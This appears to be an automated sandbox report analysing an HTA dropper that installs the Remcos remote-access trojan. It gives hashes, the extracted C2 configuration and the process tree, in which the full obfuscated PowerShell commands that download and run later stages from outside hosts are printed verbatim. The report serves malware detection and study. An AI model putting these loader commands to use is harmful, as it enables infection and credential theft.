Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
06-02-2025 11:27
Static task
static1
Behavioral task
behavioral1
Sample
sheismybestgirlwholovesmebestwithgirlfirstnightgoood.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sheismybestgirlwholovesmebestwithgirlfirstnightgoood.hta
Resource
win10v2004-20250129-en
General
-
Target
sheismybestgirlwholovesmebestwithgirlfirstnightgoood.hta
-
Size
14KB
-
MD5
32bd7fd6ff215717e8c312e746d73271
-
SHA1
fa44ea813d1714d501676bf422eb1757610e25af
-
SHA256
ac4ab4116f0955571d28bdb8024437ad7a8b379c3ca613b16f837d6768370e8e
-
SHA512
cf82ae3f481648749175f2269a41c7206bc9f3c2b0d4ea5d2e9eb973f812c638e03327aa1cf365607cde878df7102a44aadbdb99e056e0846589e2f3704b4702
-
SSDEEP
96:qTK35MrK357i6TRwrA8L0l9wK35LK35ciK35S:qTsSrsZi6TRwrEwsVseisw
Malware Config
Extracted
remcos
zyn5
sweetnessofbestthingsgivenbest.duckdns.org:14645
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-CXOW4E
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/1400-109-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4984-107-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3560-105-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3560-105-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4984-107-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 4 IoCs
flow pid Process 23 2496 powershell.exe 26 3392 powershell.exe 28 3392 powershell.exe 29 3392 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2496 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 3392 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3392 set thread context of 3972 3392 powershell.exe 101 PID 3972 set thread context of 4984 3972 CasPol.exe 103 PID 3972 set thread context of 3560 3972 CasPol.exe 104 PID 3972 set thread context of 1400 3972 CasPol.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2496 powershell.exe 2496 powershell.exe 3392 powershell.exe 3392 powershell.exe 4984 CasPol.exe 4984 CasPol.exe 1400 CasPol.exe 1400 CasPol.exe 4984 CasPol.exe 4984 CasPol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 3972 CasPol.exe 3972 CasPol.exe 3972 CasPol.exe 3972 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2496 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeDebugPrivilege 1400 CasPol.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 3880 wrote to memory of 3620 3880 mshta.exe 86 PID 3880 wrote to memory of 3620 3880 mshta.exe 86 PID 3880 wrote to memory of 3620 3880 mshta.exe 86 PID 3620 wrote to memory of 2496 3620 cmd.exe 89 PID 3620 wrote to memory of 2496 3620 cmd.exe 89 PID 3620 wrote to memory of 2496 3620 cmd.exe 89 PID 2496 wrote to memory of 3340 2496 powershell.exe 92 PID 2496 wrote to memory of 3340 2496 powershell.exe 92 PID 2496 wrote to memory of 3340 2496 powershell.exe 92 PID 3340 wrote to memory of 2348 3340 csc.exe 94 PID 3340 wrote to memory of 2348 3340 csc.exe 94 PID 3340 wrote to memory of 2348 3340 csc.exe 94 PID 2496 wrote to memory of 2388 2496 powershell.exe 97 PID 2496 wrote to memory of 2388 2496 powershell.exe 97 PID 2496 wrote to memory of 2388 2496 powershell.exe 97 PID 2388 wrote to memory of 3392 2388 WScript.exe 98 PID 2388 wrote to memory of 3392 2388 WScript.exe 98 PID 2388 wrote to memory of 3392 2388 WScript.exe 98 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3392 wrote to memory of 3972 3392 powershell.exe 101 PID 3972 wrote to memory of 4984 3972 CasPol.exe 103 PID 3972 wrote to memory of 4984 3972 CasPol.exe 103 PID 3972 wrote to memory of 4984 3972 CasPol.exe 103 PID 3972 wrote to memory of 4984 3972 CasPol.exe 103 PID 3972 wrote to memory of 3560 3972 CasPol.exe 104 PID 3972 wrote to memory of 3560 3972 CasPol.exe 104 PID 3972 wrote to memory of 3560 3972 CasPol.exe 104 PID 3972 wrote to memory of 3560 3972 CasPol.exe 104 PID 3972 wrote to memory of 4712 3972 CasPol.exe 105 PID 3972 wrote to memory of 4712 3972 CasPol.exe 105 PID 3972 wrote to memory of 4712 3972 CasPol.exe 105 PID 3972 wrote to memory of 1400 3972 CasPol.exe 106 PID 3972 wrote to memory of 1400 3972 CasPol.exe 106 PID 3972 wrote to memory of 1400 3972 CasPol.exe 106 PID 3972 wrote to memory of 1400 3972 CasPol.exe 106
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheismybestgirlwholovesmebestwithgirlfirstnightgoood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PoWERsheLl -EX bYPasS -nOP -W 1 -C DeVIcEcrEDEntiAlDeplOymeNt.eXe ; IEX($(iEx('[sYSteM.TExt.ENCODing]'+[cHAr]58+[cHAr]0X3a+'UTF8.gETstrIng([SystEM.cOnVert]'+[chAR]0X3A+[cHAR]58+'fROMbaSe64STring('+[CHAR]34+'JEQxcTM5YUtMICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlcmRFZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR2Zlem4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1FiVW0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXhubGR3Zix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGZILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoV0JSVW9oc3MpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJrZVFWeWd3aCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGNTbEpQeWZocm4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEQxcTM5YUtMOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3NC4xNDYveGFtcHAva2Ivc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnby5nSUYiLCIkZU52OkFQUERBVEFcc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnLnZicyIsMCwwKTtTVGFSdC1TTGVFUCgzKTtpbnZva2UtSXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnLnZicyI='+[CHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERsheLl -EX bYPasS -nOP -W 1 -C DeVIcEcrEDEntiAlDeplOymeNt.eXe ; IEX($(iEx('[sYSteM.TExt.ENCODing]'+[cHAr]58+[cHAr]0X3a+'UTF8.gETstrIng([SystEM.cOnVert]'+[chAR]0X3A+[cHAR]58+'fROMbaSe64STring('+[CHAR]34+'JEQxcTM5YUtMICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlcmRFZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR2Zlem4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1FiVW0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXhubGR3Zix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGZILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoV0JSVW9oc3MpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJrZVFWeWd3aCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGNTbEpQeWZocm4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEQxcTM5YUtMOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3NC4xNDYveGFtcHAva2Ivc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnby5nSUYiLCIkZU52OkFQUERBVEFcc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnLnZicyIsMCwwKTtTVGFSdC1TTGVFUCgzKTtpbnZva2UtSXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnLnZicyI='+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\401qha3k\401qha3k.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB63.tmp" "c:\Users\Admin\AppData\Local\Temp\401qha3k\CSC4391C9F9960949AE92D9AB1E5938F87.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:2348
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheismybestgirlwholovesmebestwithgirlfirstnightg.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwBzAHIAZQB3AG8AbABmAGUAcwBvAHIAcgBvAGYAbgBpAGkAZwBpAHMAZABvAG8AZwBiAGsALwBiAGsALwBwAHAAbQBhAHgALwA2ADQAMQAuADQANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAbwBwAGIAbwB4AC4AYwBvAG0ALwBzAGMAbAAvAGYAaQAvAGUAaABpADYANgAzAGgAagByAG0AZgBzADUAdwA4AHMAZwAzAHoAYQBkAC8AdgBiAHMALQBqAHMALQB3AHMAZgAtAGIAYQB0AC4AagBwAGcAPwByAGwAawBlAHkAPQAyAGgAMABuAG8AaQBwAGsAOQB1AGYAeQBkAGYAZgBqAGkAOAB4AGEANwB0ADcAdABqACYAcwB0AD0AZgA2AG8AbgB2ADcAZAA0ACYAZABsAD0AMQAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zwbsusllevl"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4984
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\jqpcvkwnaddwgr"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3560
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\usuvodghotvbjyxpsc"7⤵PID:4712
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\usuvodghotvbjyxpsc"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD5460c6613a67d37d5b26680190dd150a9
SHA1043ef3a7a15537f13564c81a1bb9972c12cc96c3
SHA256a32ba61fdd0f9f56ba806c3203293de340d4a2edf6a6374f98d97816231dfd78
SHA5127429338ca297b07b202ad29f709697e73d5ed671d7b0a184ffcd15a5aa6d2bfbc11bc894c99cab7383018488a407be990d276b35b478683588fc353731a83cda
-
Filesize
3KB
MD5044a754559ea0f74706e3554a9e3a821
SHA1f7fe4457f5fb35598ffeb8423e5c5d9458605a61
SHA256b5b13e699e578f71af660dc69115d5f34c577dc19e2d37193a2aa1e4d40babc4
SHA512e6c1cdbbb08d97093c50c59efdb72a57366d7d6323428fb0dd89dc8cde09b73cf8cf6527475004a3d6e8ee91597f2189bcef42e940f3cfc633f9240967b4dcd0
-
Filesize
1KB
MD5e0403bcb87174fe2416601242277cd46
SHA18cfce01f21ef8b5bae72fe5b87fa65cd26e7abc1
SHA256b341a4c2e7edb63011ce1da1b6ea9378d36597f543e3d80da8dc963972fa1492
SHA512794ca5a29690c1ef5f830f7b7013260cb002c24f0e15b01649583540e2ca2343760e0dc920366e39ff7bacd3bd215cf51da7c756d3240e2e312418f360a8445e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD57ee436e0deb0559f4fd96c619dba6546
SHA1e0d9ac1e6effd881b792388ef5627dac43019d1c
SHA256fd4f747a1dcecfe9d88b8b0fe99f6a68595c916c4694ef4a0cd66652804c365c
SHA512a2721c8a2df0d73d7523691d7bb2c5d9f1e14a7647b191aea1aa1bea62e98c858077272c3800b23e4d4558f316f6acf4f3f5f2e179d7cdb78b80978808658302
-
Filesize
184KB
MD52a0172c12274a16969fa2a1245e9a60b
SHA11d8415feff418d80c39a6996f6f2e8a52430d8bc
SHA256971a54ec031c225191a17dc9f92b53187a7ec41706edc0b11ca3ceb146fafe16
SHA512f69b6a05d5eae0ac70b30b4b1b866385f879e2f726983e4223a294fefb0f02751539323d97cc7ca59aee7dc107b7643d91b67bb05cdc9abee04c6d51e085499f
-
Filesize
482B
MD50955f1d0bdaede5dd37d39eacf595b95
SHA10d3f0c10deceaefb6804debb5c59d8333438985e
SHA25626d892506efb1f751236d425e71ac7052c78b1bb95cfa27002d861d7c3499bea
SHA51297f817dee082b90596c5ea5fdefd71aeb262cc5b38284c0a42a811734ac250b38c19171074c2a25decf8a4068ec4d45c12e76125469f473142c0dc53049780f8
-
Filesize
369B
MD55f01cac3160cea910844d91014292cd6
SHA10d81f6c50e355e14f535ba00e4f0fb5038cff437
SHA256a9498838fe1bf50693a358389c134b29d1204e8a6a48b2a1660354aa9e0a67e8
SHA5127de04b27841181d0464676c2aac1522e0dbc3b5331dd01969ead060bf0f58c44f6ad9ad3db0348522db8bbebf986685db41eb26b71f1cf02d1a85e482fa443f7
-
Filesize
652B
MD5adca41f8615c9b6d514e41f58c8053fc
SHA1943baa67d0aa91117e9b3b1101e09d4fb888b0f4
SHA256c32b95eb3728110e6470ca6fce78fad5b9678eeeaa70c96878f06fd44bb537b7
SHA5123809c3ebb34656022ddc3f9345ae2959a170101795987e0bf96b1c1f5e62dee99067785af1a6cb541f5f277f7f1acb7728e8c91efc0e2d5e7a2e5c95dc2137eb